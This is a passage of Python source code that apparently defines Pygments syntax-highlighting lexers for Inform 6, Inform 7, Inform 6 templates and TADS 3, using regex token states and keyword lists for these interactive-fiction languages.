name = 'Inform 6'
aliases = ['inform6', 'i6']
filenames = ['*.inf']
flags = re.MULTILINE | re.DOTALL | re.UNICODE
_name = r'[a-zA-Z_]\w*'
# Inform 7 maps these four character classes to their ASCII
# equivalents. To support Inform 6 inclusions within Inform 7,
# Inform6Lexer maps them too.
_dash = u'\\-\u2010-\u2014'
_dquote = u'"\u201c\u201d'
_squote = u"'\u2018\u2019"
_newline = u'\\n\u0085\u2028\u2029'
tokens = {
'root': [
(r'\A(!%%[^%s]*[%s])+' % (_newline, _newline), Comment.Preproc,
'directive'),
default('directive')
],
'_whitespace': [
(r'\s+', Text),
(r'![^%s]*' % _newline, Comment.Single)
],
'default': [
include('_whitespace'),
(r'\[', Punctuation, 'many-values'), # Array initialization
(r':|(?=;)', Punctuation, '#pop'),
(r'<', Punctuation), # Second angle bracket in an action statement
default(('expression', '_expression'))
],
# Expressions
'_expression': [
include('_whitespace'),
(r'(?=sp\b)', Text, '#pop'),
(r'(?=[%s%s$0-9#a-zA-Z_])' % (_dquote, _squote), Text,
('#pop', 'value')),
(r'\+\+|[%s]{1,2}(?!>)|~~?' % _dash, Operator),
(r'(?=[()\[%s,?@{:;])' % _dash, Text, '#pop')
],
'expression': [
include('_whitespace'),
(r'\(', Punctuation, ('expression', '_expression')),
(r'\)', Punctuation, '#pop'),
(r'\[', Punctuation, ('#pop', 'statements', 'locals')),
(r'>(?=(\s+|(![^%s]*))*[>;])' % _newline, Punctuation),
(r'\+\+|[%s]{2}(?!>)' % _dash, Operator),
(r',', Punctuation, '_expression'),
(r'&&?|\|\|?|[=~><]?=|[%s]{1,2}>?|\.\.?[&#]?|::|[<>+*/%%]' % _dash,
Operator, '_expression'),
(r'(has|hasnt|in|notin|ofclass|or|provides)\b', Operator.Word,
'_expression'),
(r'sp\b', Name),
(r'\?~?', Name.Label, 'label?'),
(r'[@{]', Error),
default('#pop')
],
'_assembly-expression': [
(r'\(', Punctuation, ('#push', '_expression')),
(r'[\[\]]', Punctuation),
(r'[%s]>' % _dash, Punctuation, '_expression'),
(r'sp\b', Keyword.Pseudo),
(r';', Punctuation, '#pop:3'),
include('expression')
],
'_for-expression': [
(r'\)', Punctuation, '#pop:2'),
(r':', Punctuation, '#pop'),
include('expression')
],
'_keyword-expression': [
(r'(from|near|to)\b', Keyword, '_expression'),
include('expression')
],
'_list-expression': [
(r',', Punctuation, '#pop'),
include('expression')
],
'_object-expression': [
(r'has\b', Keyword.Declaration, '#pop'),
include('_list-expression')
],
# Values
'value': [
include('_whitespace'),
# Strings
(r'[%s][^@][%s]' % (_squote, _squote), String.Char, '#pop'),
(r'([%s])(@\{[0-9a-fA-F]{1,4}\})([%s])' % (_squote, _squote),
bygroups(String.Char, String.Escape, String.Char), '#pop'),
(r'([%s])(@.{2})([%s])' % (_squote, _squote),
bygroups(String.Char, String.Escape, String.Char), '#pop'),
(r'[%s]' % _squote, String.Single, ('#pop', 'dictionary-word')),
(r'[%s]' % _dquote, String.Double, ('#pop', 'string')),
# Numbers
(r'\$[+%s][0-9]*\.?[0-9]*([eE][+%s]?[0-9]+)?' % (_dash, _dash),
Number.Float, '#pop'),
(r'\$[0-9a-fA-F]+', Number.Hex, '#pop'),
(r'\$\$[01]+', Number.Bin, '#pop'),
(r'[0-9]+', Number.Integer, '#pop'),
# Values prefixed by hashes
(r'(##|#a\$)(%s)' % _name, bygroups(Operator, Name), '#pop'),
(r'(#g\$)(%s)' % _name,
bygroups(Operator, Name.Variable.Global), '#pop'),
(r'#[nw]\$', Operator, ('#pop', 'obsolete-dictionary-word')),
(r'(#r\$)(%s)' % _name, bygroups(Operator, Name.Function), '#pop'),
(r'#', Name.Builtin, ('#pop', 'system-constant')),
# System functions
(words((
'child', 'children', 'elder', 'eldest', 'glk', 'indirect', 'metaclass',
'parent', 'random', 'sibling', 'younger', 'youngest'), suffix=r'\b'),
Name.Builtin, '#pop'),
# Metaclasses
(r'(?i)(Class|Object|Routine|String)\b', Name.Builtin, '#pop'),
# Veneer routines
(words((
'Box__Routine', 'CA__Pr', 'CDefArt', 'CInDefArt', 'Cl__Ms',
'Copy__Primitive', 'CP__Tab', 'DA__Pr', 'DB__Pr', 'DefArt', 'Dynam__String',
'EnglishNumber', 'Glk__Wrap', 'IA__Pr', 'IB__Pr', 'InDefArt', 'Main__',
'Meta__class', 'OB__Move', 'OB__Remove', 'OC__Cl', 'OP__Pr', 'Print__Addr',
'Print__PName', 'PrintShortName', 'RA__Pr', 'RA__Sc', 'RL__Pr', 'R_Process',
'RT__ChG', 'RT__ChGt', 'RT__ChLDB', 'RT__ChLDW', 'RT__ChPR', 'RT__ChPrintA',
'RT__ChPrintC', 'RT__ChPrintO', 'RT__ChPrintS', 'RT__ChPS', 'RT__ChR',
'RT__ChSTB', 'RT__ChSTW', 'RT__ChT', 'RT__Err', 'RT__TrPS', 'RV__Pr',
'Symb__Tab', 'Unsigned__Compare', 'WV__Pr', 'Z__Region'),
prefix='(?i)', suffix=r'\b'),
Name.Builtin, '#pop'),
# Other built-in symbols
(words((
'call', 'copy', 'create', 'DEBUG', 'destroy', 'DICT_CHAR_SIZE',
'DICT_ENTRY_BYTES', 'DICT_IS_UNICODE', 'DICT_WORD_SIZE', 'false',
'FLOAT_INFINITY', 'FLOAT_NAN', 'FLOAT_NINFINITY', 'GOBJFIELD_CHAIN',
'GOBJFIELD_CHILD', 'GOBJFIELD_NAME', 'GOBJFIELD_PARENT',
'GOBJFIELD_PROPTAB', 'GOBJFIELD_SIBLING', 'GOBJ_EXT_START',
'GOBJ_TOTAL_LENGTH', 'Grammar__Version', 'INDIV_PROP_START', 'INFIX',
'infix__watching', 'MODULE_MODE', 'name', 'nothing', 'NUM_ATTR_BYTES', 'print',
'print_to_array', 'recreate', 'remaining', 'self', 'sender', 'STRICT_MODE',
'sw__var', 'sys__glob0', 'sys__glob1', 'sys__glob2', 'sys_statusline_flag',
'TARGET_GLULX', 'TARGET_ZCODE', 'temp__global2', 'temp__global3',
'temp__global4', 'temp_global', 'true', 'USE_MODULES', 'WORDSIZE'),
prefix='(?i)', suffix=r'\b'),
Name.Builtin, '#pop'),
# Other values
(_name, Name, '#pop')
],
# Strings
'dictionary-word': [
(r'[~^]+', String.Escape),
(r'[^~^\\@({%s]+' % _squote, String.Single),
(r'[({]', String.Single),
(r'@\{[0-9a-fA-F]{,4}\}', String.Escape),
(r'@.{2}', String.Escape),
(r'[%s]' % _squote, String.Single, '#pop')
],
'string': [
(r'[~^]+', String.Escape),
(r'[^~^\\@({%s]+' % _dquote, String.Double),
(r'[({]', String.Double),
(r'\\', String.Escape),
(r'@(\\\s*[%s]\s*)*@((\\\s*[%s]\s*)*[0-9])*' %
(_newline, _newline), String.Escape),
(r'@(\\\s*[%s]\s*)*\{((\\\s*[%s]\s*)*[0-9a-fA-F]){,4}'
r'(\\\s*[%s]\s*)*\}' % (_newline, _newline, _newline),
String.Escape),
(r'@(\\\s*[%s]\s*)*.(\\\s*[%s]\s*)*.' % (_newline, _newline),
String.Escape),
(r'[%s]' % _dquote, String.Double, '#pop')
],
'plain-string': [
(r'[^~^\\({\[\]%s]+' % _dquote, String.Double),
(r'[~^({\[\]]', String.Double),
(r'\\', String.Escape),
(r'[%s]' % _dquote, String.Double, '#pop')
],
# Names
'_constant': [
include('_whitespace'),
(_name, Name.Constant, '#pop'),
include('value')
],
'_global': [
include('_whitespace'),
(_name, Name.Variable.Global, '#pop'),
include('value')
],
'label?': [
include('_whitespace'),
(_name, Name.Label, '#pop'),
default('#pop')
],
'variable?': [
include('_whitespace'),
(_name, Name.Variable, '#pop'),
default('#pop')
],
# Values after hashes
'obsolete-dictionary-word': [
(r'\S\w*', String.Other, '#pop')
],
'system-constant': [
include('_whitespace'),
(_name, Name.Builtin, '#pop')
],
# Directives
'directive': [
include('_whitespace'),
(r'#', Punctuation),
(r';', Punctuation, '#pop'),
(r'\[', Punctuation,
('default', 'statements', 'locals', 'routine-name?')),
(words((
'abbreviate', 'endif', 'dictionary', 'ifdef', 'iffalse', 'ifndef', 'ifnot',
'iftrue', 'ifv3', 'ifv5', 'release', 'serial', 'switches', 'system_file',
'version'), prefix='(?i)', suffix=r'\b'),
Keyword, 'default'),
(r'(?i)(array|global)\b', Keyword,
('default', 'directive-keyword?', '_global')),
(r'(?i)attribute\b', Keyword, ('default', 'alias?', '_constant')),
(r'(?i)class\b', Keyword,
('object-body', 'duplicates', 'class-name')),
(r'(?i)(constant|default)\b', Keyword,
('default', 'expression', '_constant')),
(r'(?i)(end\b)(.*)', bygroups(Keyword, Text)),
(r'(?i)(extend|verb)\b', Keyword, 'grammar'),
(r'(?i)fake_action\b', Keyword, ('default', '_constant')),
(r'(?i)import\b', Keyword, 'manifest'),
(r'(?i)(include|link)\b', Keyword,
('default', 'before-plain-string')),
(r'(?i)(lowstring|undef)\b', Keyword, ('default', '_constant')),
(r'(?i)message\b', Keyword, ('default', 'diagnostic')),
(r'(?i)(nearby|object)\b', Keyword,
('object-body', '_object-head')),
(r'(?i)property\b', Keyword,
('default', 'alias?', '_constant', 'property-keyword*')),
(r'(?i)replace\b', Keyword,
('default', 'routine-name?', 'routine-name?')),
(r'(?i)statusline\b', Keyword, ('default', 'directive-keyword?')),
(r'(?i)stub\b', Keyword, ('default', 'routine-name?')),
(r'(?i)trace\b', Keyword,
('default', 'trace-keyword?', 'trace-keyword?')),
(r'(?i)zcharacter\b', Keyword,
('default', 'directive-keyword?', 'directive-keyword?')),
(_name, Name.Class, ('object-body', '_object-head'))
],
# [, Replace, Stub
'routine-name?': [
include('_whitespace'),
(_name, Name.Function, '#pop'),
default('#pop')
],
'locals': [
include('_whitespace'),
(r';', Punctuation, '#pop'),
(r'\*', Punctuation),
(_name, Name.Variable)
],
# Array
'many-values': [
include('_whitespace'),
(r';', Punctuation),
(r'\]', Punctuation, '#pop'),
(r':', Error),
default(('expression', '_expression'))
],
# Attribute, Property
'alias?': [
include('_whitespace'),
(r'alias\b', Keyword, ('#pop', '_constant')),
default('#pop')
],
# Class, Object, Nearby
'class-name': [
include('_whitespace'),
(r'(?=[,;]|(class|has|private|with)\b)', Text, '#pop'),
(_name, Name.Class, '#pop')
],
'duplicates': [
include('_whitespace'),
(r'\(', Punctuation, ('#pop', 'expression', '_expression')),
default('#pop')
],
'_object-head': [
(r'[%s]>' % _dash, Punctuation),
(r'(class|has|private|with)\b', Keyword.Declaration, '#pop'),
include('_global')
],
'object-body': [
include('_whitespace'),
(r';', Punctuation, '#pop:2'),
(r',', Punctuation),
(r'class\b', Keyword.Declaration, 'class-segment'),
(r'(has|private|with)\b', Keyword.Declaration),
(r':', Error),
default(('_object-expression', '_expression'))
],
'class-segment': [
include('_whitespace'),
(r'(?=[,;]|(class|has|private|with)\b)', Text, '#pop'),
(_name, Name.Class),
default('value')
],
# Extend, Verb
'grammar': [
include('_whitespace'),
(r'=', Punctuation, ('#pop', 'default')),
(r'\*', Punctuation, ('#pop', 'grammar-line')),
default('_directive-keyword')
],
'grammar-line': [
include('_whitespace'),
(r';', Punctuation, '#pop'),
(r'[/*]', Punctuation),
(r'[%s]>' % _dash, Punctuation, 'value'),
(r'(noun|scope)\b', Keyword, '=routine'),
default('_directive-keyword')
],
'=routine': [
include('_whitespace'),
(r'=', Punctuation, 'routine-name?'),
default('#pop')
],
# Import
'manifest': [
include('_whitespace'),
(r';', Punctuation, '#pop'),
(r',', Punctuation),
(r'(?i)global\b', Keyword, '_global'),
default('_global')
],
# Include, Link, Message
'diagnostic': [
include('_whitespace'),
(r'[%s]' % _dquote, String.Double, ('#pop', 'message-string')),
default(('#pop', 'before-plain-string', 'directive-keyword?'))
],
'before-plain-string': [
include('_whitespace'),
(r'[%s]' % _dquote, String.Double, ('#pop', 'plain-string'))
],
'message-string': [
(r'[~^]+', String.Escape),
include('plain-string')
],
# Keywords used in directives
'_directive-keyword!': [
include('_whitespace'),
(words((
'additive', 'alias', 'buffer', 'class', 'creature', 'data', 'error', 'fatalerror',
'first', 'has', 'held', 'initial', 'initstr', 'last', 'long', 'meta', 'multi',
'multiexcept', 'multiheld', 'multiinside', 'noun', 'number', 'only', 'private',
'replace', 'reverse', 'scope', 'score', 'special', 'string', 'table', 'terminating',
'time', 'topic', 'warning', 'with'), suffix=r'\b'),
Keyword, '#pop'),
(r'[%s]{1,2}>|[+=]' % _dash, Punctuation, '#pop')
],
'_directive-keyword': [
include('_directive-keyword!'),
include('value')
],
'directive-keyword?': [
include('_directive-keyword!'),
default('#pop')
],
'property-keyword*': [
include('_whitespace'),
(r'(additive|long)\b', Keyword),
default('#pop')
],
'trace-keyword?': [
include('_whitespace'),
(words((
'assembly', 'dictionary', 'expressions', 'lines', 'linker',
'objects', 'off', 'on', 'symbols', 'tokens', 'verbs'), suffix=r'\b'),
Keyword, '#pop'),
default('#pop')
],
# Statements
'statements': [
include('_whitespace'),
(r'\]', Punctuation, '#pop'),
(r'[;{}]', Punctuation),
(words((
'box', 'break', 'continue', 'default', 'give', 'inversion',
'new_line', 'quit', 'read', 'remove', 'return', 'rfalse', 'rtrue',
'spaces', 'string', 'until'), suffix=r'\b'),
Keyword, 'default'),
(r'(do|else)\b', Keyword),
(r'(font|style)\b', Keyword,
('default', 'miscellaneous-keyword?')),
(r'for\b', Keyword, ('for', '(?')),
(r'(if|switch|while)', Keyword,
('expression', '_expression', '(?')),
(r'(jump|save|restore)\b', Keyword, ('default', 'label?')),
(r'objectloop\b', Keyword,
('_keyword-expression', 'variable?', '(?')),
(r'print(_ret)?\b|(?=[%s])' % _dquote, Keyword, 'print-list'),
(r'\.', Name.Label, 'label?'),
(r'@', Keyword, 'opcode'),
(r'#(?![agrnw]\$|#)', Punctuation, 'directive'),
(r'<', Punctuation, 'default'),
(r'move\b', Keyword,
('default', '_keyword-expression', '_expression')),
default(('default', '_keyword-expression', '_expression'))
],
'miscellaneous-keyword?': [
include('_whitespace'),
(r'(bold|fixed|from|near|off|on|reverse|roman|to|underline)\b',
Keyword, '#pop'),
(r'(a|A|an|address|char|name|number|object|property|string|the|'
r'The)\b(?=(\s+|(![^%s]*))*\))' % _newline, Keyword.Pseudo,
'#pop'),
(r'%s(?=(\s+|(![^%s]*))*\))' % (_name, _newline), Name.Function,
'#pop'),
default('#pop')
],
'(?': [
include('_whitespace'),
(r'\(', Punctuation, '#pop'),
default('#pop')
],
'for': [
include('_whitespace'),
(r';', Punctuation, ('_for-expression', '_expression')),
default(('_for-expression', '_expression'))
],
'print-list': [
include('_whitespace'),
(r';', Punctuation, '#pop'),
(r':', Error),
default(('_list-expression', '_expression', '_list-expression', 'form'))
],
'form': [
include('_whitespace'),
(r'\(', Punctuation, ('#pop', 'miscellaneous-keyword?')),
default('#pop')
],
# Assembly
'opcode': [
include('_whitespace'),
(r'[%s]' % _dquote, String.Double, ('operands', 'plain-string')),
(_name, Keyword, 'operands')
],
'operands': [
(r':', Error),
default(('_assembly-expression', '_expression'))
]
}
def get_tokens_unprocessed(self, text):
# 'in' is either a keyword or an operator.
# If the token two tokens after 'in' is ')', 'in' is a keyword:
# objectloop(a in b)
# Otherwise, it is an operator:
# objectloop(a in b && true)
objectloop_queue = []
objectloop_token_count = -1
previous_token = None
for index, token, value in RegexLexer.get_tokens_unprocessed(self,
text):
if previous_token is Name.Variable and value == 'in':
objectloop_queue = [[index, token, value]]
objectloop_token_count = 2
elif objectloop_token_count > 0:
if token not in Comment and token not in Text:
objectloop_token_count -= 1
objectloop_queue.append((index, token, value))
else:
if objectloop_token_count == 0:
if objectloop_queue[-1][2] == ')':
objectloop_queue[0][1] = Keyword
while objectloop_queue:
yield objectloop_queue.pop(0)
objectloop_token_count = -1
yield index, token, value
if token not in Comment and token not in Text:
previous_token = token
while objectloop_queue:
yield objectloop_queue.pop(0)
class Inform7Lexer(RegexLexer):
"""
For `Inform 7 <http://inform7.com/>`_ source code.
.. versionadded:: 2.0
"""
name = 'Inform 7'
aliases = ['inform7', 'i7']
filenames = ['*.ni', '*.i7x']
flags = re.MULTILINE | re.DOTALL | re.UNICODE
_dash = Inform6Lexer._dash
_dquote = Inform6Lexer._dquote
_newline = Inform6Lexer._newline
_start = r'\A|(?<=[%s])' % _newline
# There are three variants of Inform 7, differing in how to
# interpret at signs and braces in I6T. In top-level inclusions, at
# signs in the first column are inweb syntax. In phrase definitions
# and use options, tokens in braces are treated as I7. Use options
# also interpret "{N}".
tokens = {}
token_variants = ['+i6t-not-inline', '+i6t-inline', '+i6t-use-option']
for level in token_variants:
tokens[level] = {
'+i6-root': list(Inform6Lexer.tokens['root']),
'+i6t-root': [ # For Inform6TemplateLexer
(r'[^%s]*' % Inform6Lexer._newline, Comment.Preproc,
('directive', '+p'))
],
'root': [
(r'(\|?\s)+', Text),
(r'\[', Comment.Multiline, '+comment'),
(r'[%s]' % _dquote, Generic.Heading,
('+main', '+titling', '+titling-string')),
default(('+main', '+heading?'))
],
'+titling-string': [
(r'[^%s]+' % _dquote, Generic.Heading),
(r'[%s]' % _dquote, Generic.Heading, '#pop')
],
'+titling': [
(r'\[', Comment.Multiline, '+comment'),
(r'[^%s.;:|%s]+' % (_dquote, _newline), Generic.Heading),
(r'[%s]' % _dquote, Generic.Heading, '+titling-string'),
(r'[%s]{2}|(?<=[\s%s])\|[\s%s]' % (_newline, _dquote, _dquote),
Text, ('#pop', '+heading?')),
(r'[.;:]|(?<=[\s%s])\|' % _dquote, Text, '#pop'),
(r'[|%s]' % _newline, Generic.Heading)
],
'+main': [
(r'(?i)[^%s:a\[(|%s]+' % (_dquote, _newline), Text),
(r'[%s]' % _dquote, String.Double, '+text'),
(r':', Text, '+phrase-definition'),
(r'(?i)\bas\b', Text, '+use-option'),
(r'\[', Comment.Multiline, '+comment'),
(r'(\([%s])(.*?)([%s]\))' % (_dash, _dash),
bygroups(Punctuation,
using(this, state=('+i6-root', 'directive'),
i6t='+i6t-not-inline'), Punctuation)),
(r'(%s|(?<=[\s;:.%s]))\|\s|[%s]{2,}' %
(_start, _dquote, _newline), Text, '+heading?'),
(r'(?i)[a(|%s]' % _newline, Text)
],
'+phrase-definition': [
(r'\s+', Text),
(r'\[', Comment.Multiline, '+comment'),
(r'(\([%s])(.*?)([%s]\))' % (_dash, _dash),
bygroups(Punctuation,
using(this, state=('+i6-root', 'directive',
'default', 'statements'),
i6t='+i6t-inline'), Punctuation), '#pop'),
default('#pop')
],
'+use-option': [
(r'\s+', Text),
(r'\[', Comment.Multiline, '+comment'),
(r'(\([%s])(.*?)([%s]\))' % (_dash, _dash),
bygroups(Punctuation,
using(this, state=('+i6-root', 'directive'),
i6t='+i6t-use-option'), Punctuation), '#pop'),
default('#pop')
],
'+comment': [
(r'[^\[\]]+', Comment.Multiline),
(r'\[', Comment.Multiline, '#push'),
(r'\]', Comment.Multiline, '#pop')
],
'+text': [
(r'[^\[%s]+' % _dquote, String.Double),
(r'\[.*?\]', String.Interpol),
(r'[%s]' % _dquote, String.Double, '#pop')
],
'+heading?': [
(r'(\|?\s)+', Text),
(r'\[', Comment.Multiline, '+comment'),
(r'[%s]{4}\s+' % _dash, Text, '+documentation-heading'),
(r'[%s]{1,3}' % _dash, Text),
(r'(?i)(volume|book|part|chapter|section)\b[^%s]*' % _newline,
Generic.Heading, '#pop'),
default('#pop')
],
'+documentation-heading': [
(r'\s+', Text),
(r'\[', Comment.Multiline, '+comment'),
(r'(?i)documentation\s+', Text, '+documentation-heading2'),
default('#pop')
],
'+documentation-heading2': [
(r'\s+', Text),
(r'\[', Comment.Multiline, '+comment'),
(r'[%s]{4}\s' % _dash, Text, '+documentation'),
default('#pop:2')
],
'+documentation': [
(r'(?i)(%s)\s*(chapter|example)\s*:[^%s]*' %
(_start, _newline), Generic.Heading),
(r'(?i)(%s)\s*section\s*:[^%s]*' % (_start, _newline),
Generic.Subheading),
(r'((%s)\t.*?[%s])+' % (_start, _newline),
using(this, state='+main')),
(r'[^%s\[]+|[%s\[]' % (_newline, _newline), Text),
(r'\[', Comment.Multiline, '+comment'),
],
'+i6t-not-inline': [
(r'(%s)@c( .*?)?([%s]|\Z)' % (_start, _newline),
Comment.Preproc),
(r'(%s)@([%s]+|Purpose:)[^%s]*' % (_start, _dash, _newline),
Comment.Preproc),
(r'(%s)@p( .*?)?([%s]|\Z)' % (_start, _newline),
Generic.Heading, '+p')
],
'+i6t-use-option': [
include('+i6t-not-inline'),
(r'(\{)(N)(\})', bygroups(Punctuation, Text, Punctuation))
],
'+i6t-inline': [
(r'(\{)(\S[^}]*)?(\})',
bygroups(Punctuation, using(this, state='+main'),
Punctuation))
],
'+i6t': [
(r'(\{[%s])(![^}]*)(\}?)' % _dash,
bygroups(Punctuation, Comment.Single, Punctuation)),
(r'(\{[%s])(lines)(:)([^}]*)(\}?)' % _dash,
bygroups(Punctuation, Keyword, Punctuation, Text,
Punctuation), '+lines'),
(r'(\{[%s])([^:}]*)(:?)([^}]*)(\}?)' % _dash,
bygroups(Punctuation, Keyword, Punctuation, Text,
Punctuation)),
(r'(\(\+)(.*?)(\+\)|\Z)',
bygroups(Punctuation, using(this, state='+main'),
Punctuation))
],
'+p': [
(r'[^@]+', Comment.Preproc),
(r'(%s)@c( .*?)?([%s]|\Z)' % (_start, _newline),
Comment.Preproc, '#pop'),
(r'(%s)@([%s]|Purpose:)' % (_start, _dash), Comment.Preproc),
(r'(%s)@p( .*?)?([%s]|\Z)' % (_start, _newline),
Generic.Heading),
(r'@', Comment.Preproc)
],
'+lines': [
(r'(%s)@c( .*?)?([%s]|\Z)' % (_start, _newline),
Comment.Preproc),
(r'(%s)@([%s]|Purpose:)[^%s]*' % (_start, _dash, _newline),
Comment.Preproc),
(r'(%s)@p( .*?)?([%s]|\Z)' % (_start, _newline),
Generic.Heading, '+p'),
(r'(%s)@\w*[ %s]' % (_start, _newline), Keyword),
(r'![^%s]*' % _newline, Comment.Single),
(r'(\{)([%s]endlines)(\})' % _dash,
bygroups(Punctuation, Keyword, Punctuation), '#pop'),
(r'[^@!{]+?([%s]|\Z)|.' % _newline, Text)
]
}
# Inform 7 can include snippets of Inform 6 template language,
# so all of Inform6Lexer's states are copied here, with
# modifications to account for template syntax. Inform7Lexer's
# own states begin with '+' to avoid name conflicts. Some of
# Inform6Lexer's states begin with '_': these are not modified.
# They deal with template syntax either by including modified
# states, or by matching r'' then pushing to modified states.
for token in Inform6Lexer.tokens:
if token == 'root':
continue
tokens[level][token] = list(Inform6Lexer.tokens[token])
if not token.startswith('_'):
tokens[level][token][:0] = [include('+i6t'), include(level)]
def __init__(self, **options):
level = options.get('i6t', '+i6t-not-inline')
if level not in self._all_tokens:
self._tokens = self.__class__.process_tokendef(level)
else:
self._tokens = self._all_tokens[level]
RegexLexer.__init__(self, **options)
class Inform6TemplateLexer(Inform7Lexer):
"""
For `Inform 6 template
<http://inform7.com/sources/src/i6template/Woven/index.html>`_ code.
.. versionadded:: 2.0
"""
name = 'Inform 6 template'
aliases = ['i6t']
filenames = ['*.i6t']
def get_tokens_unprocessed(self, text, stack=('+i6t-root',)):
return Inform7Lexer.get_tokens_unprocessed(self, text, stack)
class Tads3Lexer(RegexLexer):
"""
For `TADS 3 <http://www.tads.org/>`_ source code.
"""
name = 'TADS 3'
aliases = ['tads3']
filenames = ['*.t']
flags = re.DOTALL | re.MULTILINE
_comment_single = r'(?://(?:[^\\\n]|\\+[\w\W])*$)'
_comment_multiline = r'(?:/\*(?:[^*]|\*(?!/))*\*/)'
_escape = (r'(?:\\(?:[\n\\<>"\'^v bnrt]|u[\da-fA-F]{,4}|x[\da-fA-F]{,2}|'
r'[0-3]?[0-7]{1,2}))')
_name = r'(?:[_a-zA-Z]\w*)'
_no_quote = r'(?=\s|\\?>)'
_operator = (r'(?:&&|\|\||\+\+|--|\?\?|::|[.,@\[\]~]|'
r'(?:[=+\-*/%!&|^]|<<?|>>?>?)=?)')
_ws = r'(?:\\|\s|%s|%s)' % (_comment_single, _comment_multiline)
_ws_pp = r'(?:\\\n|[^\S\n]|%s|%s)' % (_comment_single, _comment_multiline)
def _make_string_state(triple, double, verbatim=None, _escape=_escape):
if verbatim:
verbatim = ''.join(['(?:%s|%s)' % (re.escape(c.lower()),
re.escape(c.upper()))
for c in verbatim])
char = r'"' if double else r"'"
token = String.Double if double else String.Single
escaped_quotes = r'+|%s(?!%s{2})' % (char, char) if triple else r''
prefix = '%s%s' % ('t' if triple else '', 'd' if double else 's')
tag_state_name = '%sqt' % prefix
state = []
if triple:
state += [
(r'%s{3,}' % char, token, '#pop'),
(r'\\%s+' % char, String.Escape),
(char, token)
]
else:
state.append((char, token, '#pop'))
state += [
include('s/verbatim'),
(r'[^\\<&{}%s]+' % char, token)
]
if verbatim:
# This regex can't use `(?i)` because escape sequences are
# case-sensitive. `<\XMP>` works; `<\xmp>` doesn't.
state.append((r'\\?<(/|\\\\|(?!%s)\\)%s(?=[\s=>])' %
(_escape, verbatim),
Name.Tag, ('#pop', '%sqs' % prefix, tag_state_name)))
else:
state += [
(r'\\?<!([^><\\%s]|<(?!<)|\\%s%s|%s|\\.)*>?' %
(char, char, escaped_quotes, _escape), Comment.Multiline),
(r'(?i)\\?<listing(?=[\s=>]|\\>)', Name.Tag,
('#pop', '%sqs/listing' % prefix, tag_state_name)),
(r'(?i)\\?<xmp(?=[\s=>]|\\>)', Name.Tag,
('#pop', '%sqs/xmp' % prefix, tag_state_name)),
(r'\\?<([^\s=><\\%s]|<(?!<)|\\%s%s|%s|\\.)*' %
(char, char, escaped_quotes, _escape), Name.Tag,
tag_state_name),
include('s/entity')
]
state += [
include('s/escape'),
(r'\{([^}<\\%s]|<(?!<)|\\%s%s|%s|\\.)*\}' %
(char, char, escaped_quotes, _escape), String.Interpol),
(r'[\\&{}<]', token)
]
return state
def _make_tag_state(triple, double, _escape=_escape):
char = r'"' if double else r"'"
quantifier = r'{3,}' if triple else r''
state_name = '%s%sqt' % ('t' if triple else '', 'd' if double else 's')
token = String.Double if double else String.Single
escaped_quotes = r'+|%s(?!%s{2})' % (char, char) if triple else r''
return [
(r'%s%s' % (char, quantifier), token, '#pop:2'),
(r'(\s|\\\n)+', Text),
(r'(=)(\\?")', bygroups(Punctuation, String.Double),
'dqs/%s' % state_name),
(r"(=)(\\?')", bygroups(Punctuation, String.Single),
'sqs/%s' % state_name),
(r'=', Punctuation, 'uqs/%s' % state_name),
(r'\\?>', Name.Tag, '#pop'),
(r'\{([^}<\\%s]|<(?!<)|\\%s%s|%s|\\.)*\}' %
(char, char, escaped_quotes, _escape), String.Interpol),
(r'([^\s=><\\%s]|<(?!<)|\\%s%s|%s|\\.)+' %
(char, char, escaped_quotes, _escape), Name.Attribute),
include('s/escape'),
include('s/verbatim'),
include('s/entity'),
(r'[\\{}&]', Name.Attribute)
]
def _make_attribute_value_state(terminator, host_triple, host_double,
_escape=_escape):
token = (String.Double if terminator == r'"' else
String.Single if terminator == r"'" else String.Other)
host_char = r'"' if host_double else r"'"
host_quantifier = r'{3,}' if host_triple else r''
host_token = String.Double if host_double else String.Single
escaped_quotes = (r'+|%s(?!%s{2})' % (host_char, host_char)
if host_triple else r'')
return [
(r'%s%s' % (host_char, host_quantifier), host_token, '#pop:3'),
(r'%s%s' % (r'' if token is String.Other else r'\\?', terminator),
token, '#pop'),
include('s/verbatim'),
include('s/entity'),
(r'\{([^}<\\%s]|<(?!<)|\\%s%s|%s|\\.)*\}' %
(host_char, host_char, escaped_quotes, _escape), String.Interpol),
(r'([^\s"\'<%s{}\\&])+' % (r'>' if token is String.Other else r''),
token),
include('s/escape'),
(r'["\'\s&{<}\\]', token)
]
tokens = {
'root': [
(u'\ufeff', Text),
(r'\{', Punctuation, 'object-body'),
(r';+', Punctuation),
(r'(?=(argcount|break|case|catch|continue|default|definingobj|'
r'delegated|do|else|for|foreach|finally|goto|if|inherited|'
r'invokee|local|nil|new|operator|replaced|return|self|switch|'
r'targetobj|targetprop|throw|true|try|while)\b)', Text, 'block'),
(r'(%s)(%s*)(\()' % (_name, _ws),
bygroups(Name.Function, using(this, state='whitespace'),
Punctuation),
('block?/root', 'more/parameters', 'main/parameters')),
include('whitespace'),
(r'\++', Punctuation),
(r'[^\s!"%-(*->@-_a-z{-~]+', Error), # Averts an infinite loop
(r'(?!\Z)', Text, 'main/root')
],
'main/root': [
include('main/basic'),
default(('#pop', 'object-body/no-braces', 'classes', 'class'))
],
'object-body/no-braces': [
(r';', Punctuation, '#pop'),
(r'\{', Punctuation, ('#pop', 'object-body')),
include('object-body')
],
'object-body': [
(r';', Punctuation),
(r'\{', Punctuation, '#push'),
(r'\}', Punctuation, '#pop'),
(r':', Punctuation, ('classes', 'class')),
(r'(%s?)(%s*)(\()' % (_name, _ws),
bygroups(Name.Function, using(this, state='whitespace'),
Punctuation),
('block?', 'more/parameters', 'main/parameters')),
(r'(%s)(%s*)(\{)' % (_name, _ws),
bygroups(Name.Function, using(this, state='whitespace'),
Punctuation), 'block'),
(r'(%s)(%s*)(:)' % (_name, _ws),
bygroups(Name.Variable, using(this, state='whitespace'),
Punctuation),
('object-body/no-braces', 'classes', 'class')),
include('whitespace'),
(r'->|%s' % _operator, Punctuation, 'main'),
default('main/object-body')
],
'main/object-body': [
include('main/basic'),
(r'(%s)(%s*)(=?)' % (_name, _ws),
bygroups(Name.Variable, using(this, state='whitespace'),
Punctuation), ('#pop', 'more', 'main')),
default('#pop:2')
],
'block?/root': [
(r'\{', Punctuation, ('#pop', 'block')),
include('whitespace'),
(r'(?=[[\'"<(:])', Text, # It might be a VerbRule macro.
('#pop', 'object-body/no-braces', 'grammar', 'grammar-rules')),
# It might be a macro like DefineAction.
default(('#pop', 'object-body/no-braces'))
],
'block?': [
(r'\{', Punctuation, ('#pop', 'block')),
include('whitespace'),
default('#pop')
],
